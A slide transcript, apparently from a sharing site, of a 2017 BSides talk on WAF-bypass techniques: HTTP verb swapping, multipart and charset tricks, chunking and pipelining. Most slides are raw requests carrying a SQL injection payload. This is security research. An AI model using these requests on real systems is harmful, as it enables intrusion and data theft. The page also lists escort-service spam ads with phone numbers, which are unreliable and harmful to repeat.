Defcon Moscow #0x0A - Mikhail Firstov "Hacking routers as Web Hacker"
Defcon Moscow #0x0A - Mikhail Firstov "Hacking routers as Web Hacker"Defcon Moscow #0x0A - Mikhail Firstov "Hacking routers as Web Hacker"
Defcon Moscow #0x0A - Mikhail Firstov "Hacking routers as Web Hacker"
 
Webapp security testing
Webapp security testingWebapp security testing
Webapp security testing
 
Webapp security testing
Webapp security testingWebapp security testing
Webapp security testing
 
PLNOG 18 - Paweł Małachowski - Spy hard czyli regexpem po pakietach
PLNOG 18 - Paweł Małachowski - Spy hard czyli regexpem po pakietachPLNOG 18 - Paweł Małachowski - Spy hard czyli regexpem po pakietach
PLNOG 18 - Paweł Małachowski - Spy hard czyli regexpem po pakietach
 
«Scrapy internals» Александр Сибиряков, Scrapinghub
«Scrapy internals» Александр Сибиряков, Scrapinghub«Scrapy internals» Александр Сибиряков, Scrapinghub
«Scrapy internals» Александр Сибиряков, Scrapinghub
 
Practical IoT Exploitation (DEFCON23 IoTVillage) - Lyon Yang
Practical IoT Exploitation (DEFCON23 IoTVillage) - Lyon YangPractical IoT Exploitation (DEFCON23 IoTVillage) - Lyon Yang
Practical IoT Exploitation (DEFCON23 IoTVillage) - Lyon Yang
 
Spy hard, challenges of 100G deep packet inspection on x86 platform
Spy hard, challenges of 100G deep packet inspection on x86 platformSpy hard, challenges of 100G deep packet inspection on x86 platform
Spy hard, challenges of 100G deep packet inspection on x86 platform
 
DEF CON 27 - ORANGE TSAI and MEH CHANG - infiltrating corporate intranet like...
DEF CON 27 - ORANGE TSAI and MEH CHANG - infiltrating corporate intranet like...DEF CON 27 - ORANGE TSAI and MEH CHANG - infiltrating corporate intranet like...
DEF CON 27 - ORANGE TSAI and MEH CHANG - infiltrating corporate intranet like...
 
DEF CON 24 - workshop - Craig Young - brainwashing embedded systems
DEF CON 24 - workshop - Craig Young - brainwashing embedded systemsDEF CON 24 - workshop - Craig Young - brainwashing embedded systems
DEF CON 24 - workshop - Craig Young - brainwashing embedded systems
 

Último

VIP Kolkata Call Girl Kestopur 👉 8250192130 Available With Room
VIP Kolkata Call Girl Kestopur 👉 8250192130 Available With RoomVIP Kolkata Call Girl Kestopur 👉 8250192130 Available With Room
VIP Kolkata Call Girl Kestopur 👉 8250192130 Available With Roomdivyansh0kumar0
 
On Starlink, presented by Geoff Huston at NZNOG 2024
On Starlink, presented by Geoff Huston at NZNOG 2024On Starlink, presented by Geoff Huston at NZNOG 2024
On Starlink, presented by Geoff Huston at NZNOG 2024APNIC
 
Russian Call girl in Ajman +971563133746 Ajman Call girl Service
Russian Call girl in Ajman +971563133746 Ajman Call girl ServiceRussian Call girl in Ajman +971563133746 Ajman Call girl Service
Russian Call girl in Ajman +971563133746 Ajman Call girl Servicegwenoracqe6
 
Call Girls Dubai Prolapsed O525547819 Call Girls In Dubai Princes$
Call Girls Dubai Prolapsed O525547819 Call Girls In Dubai Princes$Call Girls Dubai Prolapsed O525547819 Call Girls In Dubai Princes$
Call Girls Dubai Prolapsed O525547819 Call Girls In Dubai Princes$kojalkojal131
 
Russian Call Girls in Kolkata Samaira 🤌 8250192130 🚀 Vip Call Girls Kolkata
Russian Call Girls in Kolkata Samaira 🤌 8250192130 🚀 Vip Call Girls KolkataRussian Call Girls in Kolkata Samaira 🤌 8250192130 🚀 Vip Call Girls Kolkata
Russian Call Girls in Kolkata Samaira 🤌 8250192130 🚀 Vip Call Girls Kolkataanamikaraghav4
 
Russian Call Girls in Kolkata Ishita 🤌 8250192130 🚀 Vip Call Girls Kolkata
Russian Call Girls in Kolkata Ishita 🤌 8250192130 🚀 Vip Call Girls KolkataRussian Call Girls in Kolkata Ishita 🤌 8250192130 🚀 Vip Call Girls Kolkata
Russian Call Girls in Kolkata Ishita 🤌 8250192130 🚀 Vip Call Girls Kolkataanamikaraghav4
 
VIP Kolkata Call Girl Salt Lake 👉 8250192130 Available With Room
VIP Kolkata Call Girl Salt Lake 👉 8250192130 Available With RoomVIP Kolkata Call Girl Salt Lake 👉 8250192130 Available With Room
VIP Kolkata Call Girl Salt Lake 👉 8250192130 Available With Roomishabajaj13
 
₹5.5k {Cash Payment}New Friends Colony Call Girls In [Delhi NIHARIKA] 🔝|97111...
₹5.5k {Cash Payment}New Friends Colony Call Girls In [Delhi NIHARIKA] 🔝|97111...₹5.5k {Cash Payment}New Friends Colony Call Girls In [Delhi NIHARIKA] 🔝|97111...
₹5.5k {Cash Payment}New Friends Colony Call Girls In [Delhi NIHARIKA] 🔝|97111...Diya Sharma
 
AlbaniaDreamin24 - How to easily use an API with Flows
AlbaniaDreamin24 - How to easily use an API with FlowsAlbaniaDreamin24 - How to easily use an API with Flows
AlbaniaDreamin24 - How to easily use an API with FlowsThierry TROUIN ☁
 
Challengers I Told Ya ShirtChallengers I Told Ya Shirt
Challengers I Told Ya ShirtChallengers I Told Ya ShirtChallengers I Told Ya ShirtChallengers I Told Ya Shirt
Challengers I Told Ya ShirtChallengers I Told Ya Shirtrahman018755
 
GDG Cloud Southlake 32: Kyle Hettinger: Demystifying the Dark Web
GDG Cloud Southlake 32: Kyle Hettinger: Demystifying the Dark WebGDG Cloud Southlake 32: Kyle Hettinger: Demystifying the Dark Web
GDG Cloud Southlake 32: Kyle Hettinger: Demystifying the Dark WebJames Anderson
 
VIP Kolkata Call Girls Salt Lake 8250192130 Available With Room
VIP Kolkata Call Girls Salt Lake 8250192130 Available With RoomVIP Kolkata Call Girls Salt Lake 8250192130 Available With Room
VIP Kolkata Call Girls Salt Lake 8250192130 Available With Roomgirls4nights
 
Delhi Call Girls Rohini 9711199171 ☎✔👌✔ Whatsapp Hard And Sexy Vip Call
Delhi Call Girls Rohini 9711199171 ☎✔👌✔ Whatsapp Hard And Sexy Vip CallDelhi Call Girls Rohini 9711199171 ☎✔👌✔ Whatsapp Hard And Sexy Vip Call
Delhi Call Girls Rohini 9711199171 ☎✔👌✔ Whatsapp Hard And Sexy Vip Callshivangimorya083
 
Hot Service (+9316020077 ) Goa Call Girls Real Photos and Genuine Service
Hot Service (+9316020077 ) Goa Call Girls Real Photos and Genuine ServiceHot Service (+9316020077 ) Goa Call Girls Real Photos and Genuine Service
Hot Service (+9316020077 ) Goa Call Girls Real Photos and Genuine Servicesexy call girls service in goa
 
Moving Beyond Twitter/X and Facebook - Social Media for local news providers
Moving Beyond Twitter/X and Facebook - Social Media for local news providersMoving Beyond Twitter/X and Facebook - Social Media for local news providers
Moving Beyond Twitter/X and Facebook - Social Media for local news providersDamian Radcliffe
 
VIP Kolkata Call Girl Alambazar 👉 8250192130 Available With Room
VIP Kolkata Call Girl Alambazar 👉 8250192130 Available With RoomVIP Kolkata Call Girl Alambazar 👉 8250192130 Available With Room
VIP Kolkata Call Girl Alambazar 👉 8250192130 Available With Roomdivyansh0kumar0
 
Enjoy Night⚡Call Girls Dlf City Phase 3 Gurgaon >༒8448380779 Escort Service
Enjoy Night⚡Call Girls Dlf City Phase 3 Gurgaon >༒8448380779 Escort ServiceEnjoy Night⚡Call Girls Dlf City Phase 3 Gurgaon >༒8448380779 Escort Service
Enjoy Night⚡Call Girls Dlf City Phase 3 Gurgaon >༒8448380779 Escort ServiceDelhi Call girls
 
Call Girls In Pratap Nagar Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Pratap Nagar Delhi 💯Call Us 🔝8264348440🔝Call Girls In Pratap Nagar Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Pratap Nagar Delhi 💯Call Us 🔝8264348440🔝soniya singh
 

Último (20)

Call Girls In South Ex 📱 9999965857 🤩 Delhi 🫦 HOT AND SEXY VVIP 🍎 SERVICE
Call Girls In South Ex 📱 9999965857 🤩 Delhi 🫦 HOT AND SEXY VVIP 🍎 SERVICECall Girls In South Ex 📱 9999965857 🤩 Delhi 🫦 HOT AND SEXY VVIP 🍎 SERVICE
Call Girls In South Ex 📱 9999965857 🤩 Delhi 🫦 HOT AND SEXY VVIP 🍎 SERVICE
 
VIP Kolkata Call Girl Kestopur 👉 8250192130 Available With Room
VIP Kolkata Call Girl Kestopur 👉 8250192130 Available With RoomVIP Kolkata Call Girl Kestopur 👉 8250192130 Available With Room
VIP Kolkata Call Girl Kestopur 👉 8250192130 Available With Room
 
On Starlink, presented by Geoff Huston at NZNOG 2024
On Starlink, presented by Geoff Huston at NZNOG 2024On Starlink, presented by Geoff Huston at NZNOG 2024
On Starlink, presented by Geoff Huston at NZNOG 2024
 
Russian Call girl in Ajman +971563133746 Ajman Call girl Service
Russian Call girl in Ajman +971563133746 Ajman Call girl ServiceRussian Call girl in Ajman +971563133746 Ajman Call girl Service
Russian Call girl in Ajman +971563133746 Ajman Call girl Service
 
Call Girls Dubai Prolapsed O525547819 Call Girls In Dubai Princes$
Call Girls Dubai Prolapsed O525547819 Call Girls In Dubai Princes$Call Girls Dubai Prolapsed O525547819 Call Girls In Dubai Princes$
Call Girls Dubai Prolapsed O525547819 Call Girls In Dubai Princes$
 
Russian Call Girls in Kolkata Samaira 🤌 8250192130 🚀 Vip Call Girls Kolkata
Russian Call Girls in Kolkata Samaira 🤌 8250192130 🚀 Vip Call Girls KolkataRussian Call Girls in Kolkata Samaira 🤌 8250192130 🚀 Vip Call Girls Kolkata
Russian Call Girls in Kolkata Samaira 🤌 8250192130 🚀 Vip Call Girls Kolkata
 
Russian Call Girls in Kolkata Ishita 🤌 8250192130 🚀 Vip Call Girls Kolkata
Russian Call Girls in Kolkata Ishita 🤌 8250192130 🚀 Vip Call Girls KolkataRussian Call Girls in Kolkata Ishita 🤌 8250192130 🚀 Vip Call Girls Kolkata
Russian Call Girls in Kolkata Ishita 🤌 8250192130 🚀 Vip Call Girls Kolkata
 
VIP Kolkata Call Girl Salt Lake 👉 8250192130 Available With Room
VIP Kolkata Call Girl Salt Lake 👉 8250192130 Available With RoomVIP Kolkata Call Girl Salt Lake 👉 8250192130 Available With Room
VIP Kolkata Call Girl Salt Lake 👉 8250192130 Available With Room
 
₹5.5k {Cash Payment}New Friends Colony Call Girls In [Delhi NIHARIKA] 🔝|97111...
₹5.5k {Cash Payment}New Friends Colony Call Girls In [Delhi NIHARIKA] 🔝|97111...₹5.5k {Cash Payment}New Friends Colony Call Girls In [Delhi NIHARIKA] 🔝|97111...
₹5.5k {Cash Payment}New Friends Colony Call Girls In [Delhi NIHARIKA] 🔝|97111...
 
AlbaniaDreamin24 - How to easily use an API with Flows
AlbaniaDreamin24 - How to easily use an API with FlowsAlbaniaDreamin24 - How to easily use an API with Flows
AlbaniaDreamin24 - How to easily use an API with Flows
 
Challengers I Told Ya ShirtChallengers I Told Ya Shirt
Challengers I Told Ya ShirtChallengers I Told Ya ShirtChallengers I Told Ya ShirtChallengers I Told Ya Shirt
Challengers I Told Ya ShirtChallengers I Told Ya Shirt
 
GDG Cloud Southlake 32: Kyle Hettinger: Demystifying the Dark Web
GDG Cloud Southlake 32: Kyle Hettinger: Demystifying the Dark WebGDG Cloud Southlake 32: Kyle Hettinger: Demystifying the Dark Web
GDG Cloud Southlake 32: Kyle Hettinger: Demystifying the Dark Web
 
VIP Kolkata Call Girls Salt Lake 8250192130 Available With Room
VIP Kolkata Call Girls Salt Lake 8250192130 Available With RoomVIP Kolkata Call Girls Salt Lake 8250192130 Available With Room
VIP Kolkata Call Girls Salt Lake 8250192130 Available With Room
 
Delhi Call Girls Rohini 9711199171 ☎✔👌✔ Whatsapp Hard And Sexy Vip Call
Delhi Call Girls Rohini 9711199171 ☎✔👌✔ Whatsapp Hard And Sexy Vip CallDelhi Call Girls Rohini 9711199171 ☎✔👌✔ Whatsapp Hard And Sexy Vip Call
Delhi Call Girls Rohini 9711199171 ☎✔👌✔ Whatsapp Hard And Sexy Vip Call
 
Hot Service (+9316020077 ) Goa Call Girls Real Photos and Genuine Service
Hot Service (+9316020077 ) Goa Call Girls Real Photos and Genuine ServiceHot Service (+9316020077 ) Goa Call Girls Real Photos and Genuine Service
Hot Service (+9316020077 ) Goa Call Girls Real Photos and Genuine Service
 
Rohini Sector 6 Call Girls Delhi 9999965857 @Sabina Saikh No Advance
Rohini Sector 6 Call Girls Delhi 9999965857 @Sabina Saikh No AdvanceRohini Sector 6 Call Girls Delhi 9999965857 @Sabina Saikh No Advance
Rohini Sector 6 Call Girls Delhi 9999965857 @Sabina Saikh No Advance
 
Moving Beyond Twitter/X and Facebook - Social Media for local news providers
Moving Beyond Twitter/X and Facebook - Social Media for local news providersMoving Beyond Twitter/X and Facebook - Social Media for local news providers
Moving Beyond Twitter/X and Facebook - Social Media for local news providers
 
VIP Kolkata Call Girl Alambazar 👉 8250192130 Available With Room
VIP Kolkata Call Girl Alambazar 👉 8250192130 Available With RoomVIP Kolkata Call Girl Alambazar 👉 8250192130 Available With Room
VIP Kolkata Call Girl Alambazar 👉 8250192130 Available With Room
 
Enjoy Night⚡Call Girls Dlf City Phase 3 Gurgaon >༒8448380779 Escort Service
Enjoy Night⚡Call Girls Dlf City Phase 3 Gurgaon >༒8448380779 Escort ServiceEnjoy Night⚡Call Girls Dlf City Phase 3 Gurgaon >༒8448380779 Escort Service
Enjoy Night⚡Call Girls Dlf City Phase 3 Gurgaon >༒8448380779 Escort Service
 
Call Girls In Pratap Nagar Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Pratap Nagar Delhi 💯Call Us 🔝8264348440🔝Call Girls In Pratap Nagar Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Pratap Nagar Delhi 💯Call Us 🔝8264348440🔝
 

A Forgotten HTTP Invisibility Cloak

  • 1. A Forgotten HTTP Invisibility Cloak BSides Manchester 2017 – by Soroush Dalili
  • 2. About Me • A web application security guy • Breaker > Builder • Love to bypass stuff with a single character  • e.g. Remember IIS6 file.asp;.jpg bypass? • Working at NCC Group • Bug bounty hunter where possible! • Twitter: @irsdl
  • 3. This Talk! • Messing with HTTP… (version < 2) • HTTP Request Smuggling! • Not all new, but forgotten • Lots of heat • We are burning our bypass techniques! • Brain teasers alert! o_x • Boring HTTP requests alert! x_x
  • 4.
  • 5. Game Changers! • Web Servers (IIS, Apache, …) • Technologies (ASPX, ASP, JSP, …) • Gateways and Proxies • Also important: • Version • Configuration • The same with WAF/IDS
  • 6. Our Targeted Webservers! • Nginx,uWSGI-Django-Python2 & Python3 • Apache-TOMCAT8-JVM1.8-JSP & TOMCAT7-JVM1.6 • Apache-PHP5 (mod_php & FastCGI) • PHP7.1 on IIS8-FastCGI • ASP Classic on IIS6, 7.5, 8, 10 • ASP.NET on IIS6, 7.5, 8, 10
  • 7. What The HTTP? • Textual & simple (before version 2) • Apart from version 2 • v1.1 (rfc2068 -> rfc2616 -> rfc7230-7235) • v1.0 (rfc1945) • v0.9 -> not expected to be supported but it still does
  • 9. A Simple HTTP Request POST /path/sample.aspx?input0=QueryValue HTTP/1.1 HOST: victim.com Cookie: input2=CookieValue Content-Type: application/x-www-form-urlencoded Content-Length: 18 input1=PostValue
  • 10. Request Mutation • Request A != Request B • Response A == Response B • Perhaps to solve one of these problems: • Browsing your favourite betting site while at work! • Looking at restricted areas of a site! • Fingerprinting the Servers • Cache poisoning, Response Splitting, Socket Buffer Poisoning (e.g. Hiding Wookiees in HTTP – Defcon24) • Bypassing a WAF/IDS during security testing!
  • 11. WAF in Security Testing!
  • 12. Common Mutations • Well documented in RFCs… • e.g. Line folding in headers • Common behaviours • /foo/../ in a normal path • URL-encoding • HTML-encoding in XML • etc. etc. • Normally detected by most of the WAFs
  • 13. Strange Mutations • Needs researching… repurposing! • Some examples to start with: • &==; – Python Django between parameters! • FooBar==POST verb – Apache with PHP • <%I%M%u011e>==<IMG> – IIS ASP Classic • ;/path1;foo/path2;bar/;==/path1/path2/ – Apache Tomcat • Sometimes even against RFC:
  • 14.
  • 15. IIS 10 ASPX (v4) Test Case – Request A POST /path/sample.aspx?input0=0 HTTP/1.1 HOST: victim.com Content-Type: application/x-www-form-urlencoded Content-Length: 41 input1='union all select * from users--
  • 16. HTTP Verb Replacement • Replacing POST with GET • Works on: • IIS (tested on ASP classic, ASPX, PHP)
  • 17. Original Request POST /path/sample.aspx?input0=0 HTTP/1.1 HOST: victim.com Content-Type: application/x-www-form-urlencoded Content-Length: 41 input1='union all select * from users--
  • 18. HTTP Verb Replacement GET /path/sample.aspx?input0=0 HTTP/1.1 HOST: victim.com Content-Type: application/x-www-form-urlencoded Content-Length: 41 input1='union all select * from users--
  • 19. Changing Body Type • File uploads also use “multipart/form-data” • Works on: • Nginx,uWSGI-Django-Python3 • Nginx,uWSGI-Django-Python2 • Apache-PHP5(mod_php) • Apache-PHP5(FastCGI) • IIS (ASPX, PHP)
  • 20. Previous Request GET /path/sample.aspx?input0=0 HTTP/1.1 HOST: victim.com Content-Type: application/x-www-form-urlencoded Content-Length: 41 input1='union all select * from users--
  • 21. Changing Body Type GET /path/sample.aspx?input0=0 HTTP/1.1 HOST: victim.com Content-Type: multipart/form-data; boundary=1 Content-Length: 95 --1 Content-Disposition: form-data; name="input1" 'union all select * from users-- --1--
  • 22. Removing Unnecessary Parts! • What if we remove some parts of the body? • Removing last “--” in the boundary: • Nginx,uWSGI-Django-Python 2 & 3 • Apache-PHP5(mod_php & FastCGI) • IIS (ASPX, PHP) • Removing “form-data;” from the multipart request: • Apache-PHP5(mod_php & FastCGI) • IIS (ASPX, PHP)
  • 23. Previous Request GET /path/sample.aspx?input0=0 HTTP/1.1 HOST: victim.com Content-Type: multipart/form-data; boundary=1 Content-Length: 95 --1 Content-Disposition: form-data; name="input1" 'union all select * from users-- --1--
  • 24. Removing Unnecessary Parts! GET /path/sample.aspx?input0=0 HTTP/1.1 HOST: victim.com Content-Type: multipart/form-data; boundary=1 Content-Length: 95 --1 Content-Disposition: name="input1" 'union all select * from users-- --1
  • 25. Adding Useless Parts! • What if we add some confusing parts? • Additional headers • Duplicated values • Useless stuffs, who cares? • Spacing can be useful too • CRLF after “Content-Disposition:” and before the space • PHP  ASPX 
  • 26. Previous Request GET /path/sample.aspx?input0=0 HTTP/1.1 HOST: victim.com Content-Type: multipart/form-data; boundary=1 Content-Length: 95 --1 Content-Disposition: name="input1" 'union all select * from users-- --1
  • 27. Adding Useless Parts! GET /path/sample.aspx?input0=0 HTTP/1.1 HOST: victim.com Content-Length: 113 Content-Type: multipart/form-data; boundary=1,boundry=irsdl --1 --1 Content-Disposition: name="input1"; filename ="test.jpg" 'union all select * from users— --1
  • 28. Changing Request Encoding! • “Content-Type” again… but charset now! • Normally used for responses but • Also works on the requests: • Nginx,uWSGI-Django-Python 2,3 • Apache-TOMCAT 7/8-JVM1.6/1.8-JSP • IIS (ASPX) • Examples: • multipart/form-data; charset=ibm037,boundary=blah • multipart/form-data;boundary=blah;charset=ibm037 • application/x-www-form-urlencoded;charset=ibm037
  • 29. Previous Request GET /path/sample.aspx?input0=0 HTTP/1.1 HOST: victim.com Content-Length: 109 Content-Type: multipart/form-data; boundary=1,boundry=irsdl --1 --1 Content-Disposition: name="input1"; filename ="test.jpg" 'union all select * from users— --1
  • 30. Changing Request Encoding! GET /path/sample.aspx?%89%95%97%A4%A3%F0=%F0 HTTP/1.1 HOST: victim.com Content-Length: 109 Content-Type: multipart/form-data; charset=ibm037, boundary=1,boundry=irsdl --1 --1 Ö•£…•£`ĉ¢—–¢‰£‰–•z@••”…~•‰•—¤£ñ•^@†‰“…••”…@@@~•£…¢£K‘—‡• }¤•‰–•@•““@¢…“…ƒ£@@†™–”@¤¢…™¢`` --1
  • 31. Encoding Example: Using Python import urllib s = 'Content-Disposition: name="input1"; filename ="test.jpg"' print urllib.quote_plus(s.encode("IBM037")) > %C3%96%95%A3%85%95%A3%60%C4%89%A2%97%96% A2%89%A3%89%96%95z%40%95%81%94%85%7E%7F%89 %95%97%A4%A3%F1%7F%5E%40%86%89%93%85%95%8 1%94%85%40%40%40%7E%7F%A3%85%A2%A3K%91%97 %87%7F
  • 32. Chunking The Body! • We can go further & further • Transfer-Encoding: chunked • Size in Hex before each part! • Comments after size with a “;” as delimiter • Ends with 0 and a CRLF
  • 33. Previous Request GET /path/sample.aspx?%89%95%97%A4%A3%F0=%F0 HTTP/1.1 HOST: victim.com Content-Length: 107 Content-Type: multipart/form-data; charset=ibm037, boundary=1,boundry=irsdl --1 --1 Ö•£…•£`ĉ¢—–¢‰£‰–•z@••”…~•‰•—¤£ñ•^@†‰“…••”…@~•£…¢£K‘—‡• }¤•‰–•@•““@¢…“…ƒ£@@†™–”@¤¢…™¢`` --1
  • 34. Chunked! GET /path/sample.aspx?%89%95%97%A4%A3%F0=%F0 HTTP/1.1 HOST: victim.com Content-Length: 107 Content-Type: multipart/form-data; charset=ibm037, boundary=1,boundry=irsdl Transfer-Encoding: chunked A --1 --1 63 Ö•£…•£`ĉ¢—–¢‰£‰–•z@•�”…~‰•—¤£ñ^@†‰“…•�”…@~£…¢£K‘—‡• }¤•‰–•@�““@¢…“…ƒ£@@†™–”@¤¢…™¢`` --1 0
  • 35. More Useless Data – Request B GET /path/sample.aspx?%89%95%97%A4%A3%F0=%F0 HTTP/1.1 HOST: victim.com Content-Length: 107 Content-Type: multipart/form-data; charset=ibm037, boundary=1,boundry=irsdl Transfer-Encoding: chunked 0000A ;--irsdl --1 --1 63;--1 Ö•£…•£`ĉ¢—–¢‰£‰–•z@•�”…~‰•—¤£ñ^@†‰“…•�”…@~£…¢£K‘—‡• }¤•‰–•@�““@¢…“…ƒ£@@†™–”@¤¢…™¢`` --1 0;--1--
  • 36. Remember the Original Request? POST /path/sample.aspx?input0=0 HTTP/1.1 HOST: victim.com Content-Type: application/x-www-form-urlencoded Content-Length: 41 input1='union all select * from users--
  • 38. HTTP Pipelining • HTTP/1.1 & 1.0 • HTTP 1.0 needs: “Connection: keep-alive” • “Connection: close” stops it (default in 1.0) • Hop by Hop • Still FIFO • 1 HTTP request can contain multiple requests • Content-Length is important if not chunked!
  • 39. HTTP Pipelining Example POST /sample.aspx?input0=1 HTTP/1.1 HOST: victim.com Content-Type: application/x-www-form-urlencoded Content-Length: 21 input1=nothingToSee POST /foobar.aspx?input0=2 HTTP/1.1 HOST: victim.com Content-Type: application/x-www-form-urlencoded Content-Length: 3 A=B …
  • 40. HTTP Pipelining & HTTP 0.9 POST /sample.aspx?input0=1 HTTP/1.1 HOST: victim.com Content-Type: application/x-www-form-urlencoded Content-Length: 21 input1=nothingToSee GET https://victim.com/anotherpage.aspx?input=value! • Bypassing default settings of a famous WAF when PATH is forbidden • What about Apache Tomcat?
  • 41. Pro Tips! • Be smart, there are more techniques, more confusions • But don’t be greedy, perhaps try them separately • Different technologies are different • External WAFs (e.g. cloud based) are easier to bypass • A proxy server can ruin your fun • but can also make it more fun!
  • 42. http://HTTP.NINJA/ • Work in progress… • Host test files, test cases, results • More tools to come • Needs community participation in near future